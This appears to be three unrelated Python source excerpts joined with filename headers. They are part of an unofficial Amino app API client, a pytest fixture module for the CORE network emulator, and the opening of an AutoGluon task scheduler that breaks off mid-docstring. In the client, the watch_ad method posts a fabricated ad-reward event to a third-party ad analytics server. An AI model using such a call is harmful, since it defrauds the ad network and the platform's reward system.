if backgroundColor: data.setdefault("extensions", {}).setdefault("style", {})["backgroundColor"] = backgroundColor
if backgroundImage: data.setdefault("extensions", {}).setdefault("style", {})["backgroundMediaList"] = [[100, backgroundImage, None, None, None]]
if defaultBubbleId: data.setdefault("extensions", {})["defaultBubbleId"] = defaultBubbleId
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
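# Usage sketch (illustrative only): `client` is an authenticated instance of
# this class. `icon` has to be an open binary file object because it is passed
# to upload_media() before being attached to the profile payload.
#
#     with open("avatar.png", "rb") as icon:
#         client.edit_profile(
#             nickname="New name",
#             content="New bio",
#             icon=icon,
#             backgroundColor="#202020",
#         )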
def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if not isAnonymous: data["privacyMode"] = 1
if isAnonymous: data["privacyMode"] = 2
if not getNotifications: data["notificationStatus"] = 2
if getNotifications: data["notificationStatus"] = 1
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/account/visit-settings", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
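# Usage sketch (illustrative only): hide the account from visitor lists while
# still receiving visitor notifications. `client` is an authenticated instance
# of this class.
#
#     client.set_privacy_status(isAnonymous=True, getNotifications=True)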
def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/account/change-amino-id", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_linked_communities(self, userId: str):
"""
Get a List of Linked Communities of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["linkedCommunityList"]).CommunityList
def get_unlinked_communities(self, userId: str):
"""
Get a List of Unlinked Communities of a User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["unlinkedCommunityList"]).CommunityList
def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
- **comIds** : IDS of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def remove_linked_community(self, comId: str):
"""
Remove a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
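# Usage sketch (illustrative only): `client` is an authenticated instance of
# this class; the IDs are placeholders. Exactly one of userId / blogId / wikiId
# should be given, and replyTo turns the comment into a reply.
#
#     client.comment(message="Welcome!", userId="user-id")                          # wall comment
#     client.comment(message="Nice post", blogId="blog-id", replyTo="comment-id")   # reply on a blog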
def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def like_blog(self, blogId: Union[str, list] = None, wikiId: str = None):
"""
Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/feed/g-vote", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType(type(blogId))
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
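# Usage sketch (illustrative only): `client` is an authenticated instance of
# this class. Passing a list of blog IDs uses the batch feed/g-vote endpoint.
#
#     client.like_blog(blogId="blog-id")               # single blog
#     client.like_blog(blogId=["blog-1", "blog-2"])    # several blogs at once
#     client.like_blog(wikiId="wiki-id")               # wiki entry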
def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = self.session.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if userId: response = self.session.delete(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = self.session.delete(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = self.session.delete(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.util.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/membership?force=true", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Membership(json.loads(response.text)).Membership
def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.util.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if language not in self.get_supported_languages(): raise exceptions.UnsupportedLanguage(language)
response = self.session.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.BlogList(json.loads(response.text)["blogList"]).BlogList
def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/wallet", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletInfo(json.loads(response.text)["wallet"]).WalletInfo
def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.util.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletHistory(json.loads(response.text)["coinHistoryList"]).WalletHistory
def get_from_deviceid(self, deviceId: str):
"""
Get the User ID from a Device ID.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.util.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/auid?deviceId={deviceId}")
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["auid"]
def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
- ``https://aminoapps.com/p/EXAMPLE``, the ``code`` is 'EXAMPLE'.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/link-resolution?q={code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
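# Usage sketch (illustrative only): resolve a shared Amino link. `client` is an
# authenticated instance of this class; splitting the URL is just one way to
# obtain the trailing code, and the printed attribute names are assumed from
# the objects.FromCode wrapper.
#
#     url = "https://aminoapps.com/p/EXAMPLE"
#     info = client.get_from_code(url.split("/")[-1])
#     print(info.objectId, info.objectType)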
def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
- **objectID** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.util.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: response = self.session.post(f"{self.api}/g/s-x{comId}/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: response = self.session.post(f"{self.api}/g/s/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["supportedLanguages"]
def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["storeSubscriptionItemList"]
def get_all_users(self, start: int = 0, size: int = 25):
"""
Get a list of Amino Users.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.util.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = self.session.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileCountList(json.loads(response.text)).UserProfileCountList
def accept_host(self, chatId: str, requestId: str):
data = json.dumps({})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def accept_organizer(self, chatId: str, requestId: str):
return self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
def link_identify(self, code: str):
response = self.session.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return json.loads(response.text)
def invite_to_vc(self, chatId: str, userId: str):
"""
Invite a User to a Voice Chat
**Parameters**
- **chatId** - ID of the Chat
- **userId** - ID of the User
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"uid": userId,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def wallet_config(self, level: int):
"""
Changes ads config
**Parameters**
- **level** - Level of the ads.
- ``1``, ``2``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"adsLevel": level,
"timestamp": int(timestamp() * 1000)
})
response = self.session.post(f"{self.api}/g/s/wallet/ads/config", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
return exceptions.CheckException(json.loads(response.text)) if response.status_code != 200 else response.status_code
def get_avatar_frames(self, start: int = 0, size: int = 25):
response = self.session.get(f"{self.api}/g/s/avatar-frame?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.AvatarFrameList(json.loads(response.text)["avatarFrameList"]).AvatarFrameList
def upload_bubble_preview(self, file: BinaryIO) -> str:
"""
Upload bubble preview image to the amino servers. Authorization required.
**Parameters**
- **file** - PNG image to be uploaded.
**Returns**
- **Success** : Url of the bubble preview image uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = file.read()
response = self.session.post(f"{self.api}/g/s/media/upload/target/chat-bubble-thumbnail", data=data, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def upload_bubble(self, config: bytes):
response = self.session.post(f"{self.api}/g/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=config, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(response.json())
else: return response.json()["chatBubble"]["bubbleId"]
def change_bubble(self, bubbleId: str, config: bytes):
response = self.session.post(f"{self.api}/g/s/chat/chat-bubble/{bubbleId}", data=config, headers=headers.Headers(type="application/octet-stream").headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(response.json())
else: return response.json()
def create_custom_bubble(self, cover: BinaryIO, previewBackgroundUrl: BinaryIO, name: str, textColor: str = "#ffffff", linkColor: str = "#039eff", contentInsets: list = None, bubbleType: int = 1, zoomPoint: list = None, allowedSlots: list = None):
if not contentInsets: contentInsets = [26, 33, 18, 49]
if not zoomPoint: zoomPoint = [41, 44]
if not allowedSlots: allowedSlots = [{"y": -5, "x": 5, "align": 1}, {"y": 5, "x": -30, "align": 4}, {"y": 5, "x": 5, "align": 3}]
icon = self.upload_bubble_preview(previewBackgroundUrl)
cover = self.upload_bubble_preview(cover)
path = icon[-3:]  # file extension of the uploaded preview image
config = json.dumps({
"status": 0,
"allowedSlots": allowedSlots,
"name": f"{name} (Costume) #0000000001",
"vertexInset": 0,
"contentInsets": contentInsets,
"coverImage": cover,
"bubbleType": bubbleType,
"zoomPoint": zoomPoint,
"version": 1,
"linkColor": linkColor,
"slots": None,
"previewBackgroundUrl": icon,
"id": "52a91df5-38e1-4433-b8d6-253630f1d2e8",
"color": textColor,
"backgroundPath": f"background.{path}"
})
with open("config.json", "w") as file:
file.write(config)
with open(f"background.png", "wb") as file:
file.write(self.session.get(icon).content)
zip = ZipFile("ChatBubble/bubble.zip", "w")
zip.write("config.json")
zip.write(f"background.png")
zip.close()
bubble = self.upload_bubble(open("ChatBubble/default.zip", "rb").read())
response = self.change_bubble(bubble, config=open("ChatBubble/bubble.zip", "rb").read())
if response.status_code != 200: return exceptions.CheckException(response)
else: return response.status_code
def watch_ad(self, uid: str = None):
data = headers.AdHeaders(uid if uid else self.userId).data
response = self.session.post("https://ads.tapdaq.com/v4/analytics/reward", json=data, headers=headers.AdHeaders().headers, proxies=self.proxies)
if response.status_code != 204: return exceptions.CheckException(response.status_code)
else: return response.status_code
|
conftest.py
|
"""
Unit test fixture module.
"""
import threading
import time
import mock
import pytest
from mock.mock import MagicMock
from core.api.grpc.client import InterfaceHelper
from core.api.grpc.server import CoreGrpcServer
from core.api.tlv.corehandlers import CoreHandler
from core.emane.emanemanager import EmaneManager
from core.emulator.coreemu import CoreEmu
from core.emulator.distributed import DistributedServer
from core.emulator.emudata import IpPrefixes
from core.emulator.enumerations import EventTypes
from core.emulator.session import Session
from core.nodes.base import CoreNode
from core.nodes.netclient import LinuxNetClient
EMANE_SERVICES = "zebra|OSPFv3MDR|IPForward"
class PatchManager:
def __init__(self):
self.patches = []
def patch_obj(self, _cls, attribute, return_value=None):
p = mock.patch.object(_cls, attribute, return_value=return_value)
p.start()
self.patches.append(p)
def patch(self, func):
p = mock.patch(func)
p.start()
self.patches.append(p)
def shutdown(self):
for p in self.patches:
p.stop()
class MockServer:
def __init__(self, config, coreemu):
self.config = config
self.coreemu = coreemu
@pytest.fixture(scope="session")
def patcher(request):
patch_manager = PatchManager()
patch_manager.patch_obj(DistributedServer, "remote_cmd", return_value="1")
if request.config.getoption("mock"):
patch_manager.patch("os.mkdir")
patch_manager.patch("core.utils.cmd")
patch_manager.patch("core.nodes.netclient.get_net_client")
patch_manager.patch_obj(
LinuxNetClient, "get_mac", return_value="00:00:00:00:00:00"
)
patch_manager.patch_obj(CoreNode, "nodefile")
patch_manager.patch_obj(Session, "write_state")
patch_manager.patch_obj(Session, "write_nodes")
patch_manager.patch_obj(EmaneManager, "buildxml")
yield patch_manager
patch_manager.shutdown()
@pytest.fixture(scope="session")
def global_coreemu(patcher):
coreemu = CoreEmu(config={"emane_prefix": "/usr"})
yield coreemu
coreemu.shutdown()
@pytest.fixture(scope="session")
def global_session(request, patcher, global_coreemu):
mkdir = not request.config.getoption("mock")
session = Session(1000, {"emane_prefix": "/usr"}, mkdir)
yield session
session.shutdown()
@pytest.fixture(scope="session")
def ip_prefixes():
return IpPrefixes(ip4_prefix="10.83.0.0/16")
@pytest.fixture(scope="session")
def interface_helper():
return InterfaceHelper(ip4_prefix="10.83.0.0/16")
@pytest.fixture(scope="module")
def module_grpc(global_coreemu):
grpc_server = CoreGrpcServer(global_coreemu)
thread = threading.Thread(target=grpc_server.listen, args=("localhost:50051",))
thread.daemon = True
thread.start()
time.sleep(0.1)
yield grpc_server
grpc_server.server.stop(None)
@pytest.fixture(scope="module")
def module_coretlv(patcher, global_coreemu, global_session):
request_mock = MagicMock()
request_mock.fileno = MagicMock(return_value=1)
server = MockServer({"numthreads": "1"}, global_coreemu)
request_handler = CoreHandler(request_mock, "", server)
request_handler.session = global_session
request_handler.add_session_handlers()
yield request_handler
@pytest.fixture
def grpc_server(module_grpc):
yield module_grpc
module_grpc.coreemu.shutdown()
@pytest.fixture
def session(global_session):
global_session.set_state(EventTypes.CONFIGURATION_STATE)
yield global_session
global_session.clear()
@pytest.fixture
def coretlv(module_coretlv):
session = module_coretlv.session
coreemu = module_coretlv.coreemu
coreemu.sessions[session.id] = session
yield module_coretlv
coreemu.shutdown()
def pytest_addoption(parser):
parser.addoption("--distributed", help="distributed server address")
parser.addoption("--mock", action="store_true", help="run without mocking")
def pytest_generate_tests(metafunc):
distributed_param = "distributed_address"
if distributed_param in metafunc.fixturenames:
distributed_address = metafunc.config.getoption("distributed")
metafunc.parametrize(distributed_param, [distributed_address])
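# Illustrative sketch (not part of this fixture module): a test that consumes
# the `distributed_address` parameter injected by pytest_generate_tests above.
# The skip guard is an assumption for runs where --distributed was not supplied.
#
#     def test_distributed(session, distributed_address):
#         if distributed_address is None:
#             pytest.skip("requires --distributed <address>")
#         ...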
|
scheduler.py
|
"""Distributed Task Scheduler"""
import os
import pickle
import logging
from warnings import warn
import multiprocessing as mp
from collections import OrderedDict
from .remote import RemoteManager
from .resource import DistributedResourceManager
from ..core import Task
from .reporter import *
from ..utils import AutoGluonWarning, AutoGluonEarlyStop, CustomProcess
logger = logging.getLogger(__name__)
__all__ = ['TaskScheduler']
class TaskScheduler(object):
"""Base Distributed Task Scheduler
"""
LOCK = mp.Lock()
RESOURCE_MANAGER = DistributedResourceManager()
REMOTE_MANAGER = RemoteManager()
def __init__(self, dist_ip_addrs=None):
if dist_ip_addrs is None:
dist_ip_addrs=[]
cls = TaskScheduler
remotes = cls.REMOTE_MANAGER.add_remote_nodes(dist_ip_addrs)
cls.RESOURCE_MANAGER.add_remote(cls.REMOTE_MANAGER.get_remotes())
self.scheduled_tasks = []
self.finished_tasks = []
def add_remote(self, ip_addrs):
"""Add remote nodes to the scheduler computation resource.
"""
ip_addrs = [ip_addrs] if isinstance(ip_addrs, str) else ip_addrs
with self.LOCK:
remotes = TaskScheduler.REMOTE_MANAGER.add_remote_nodes(ip_addrs)
TaskScheduler.RESOURCE_MANAGER.add_remote(remotes)
@classmethod
def upload_files(cls, files, **kwargs):
"""Upload files to remote machines, so that they are accessible by import or load.
"""
cls.REMOTE_MANAGER.upload_files(files, **kwargs)
def _dict_from_task(self, task):
if isinstance(task, Task):
return {'TASK_ID': task.task_id, 'Args': task.args}
else:
assert isinstance(task, dict)
return {'TASK_ID': task['TASK_ID'], 'Args': task['Args']}
def add_task(self, task, **kwargs):
"""add_task() is now deprecated in favor of add_job().
"""
warn("scheduler.add_task() is now deprecated in favor of scheduler.add_job().",
AutoGluonWarning)
self.add_job(task, **kwargs)
def add_job(self, task, **kwargs):
"""Adding a training task to the scheduler.
Args:
task (:class:`autogluon.scheduler.Task`): a new training task
Relevant entries in kwargs:
- bracket: HB bracket to be used. Has been sampled in _promote_config
- new_config: If True, task starts new config eval, otherwise it promotes
a config (only if type == 'promotion')
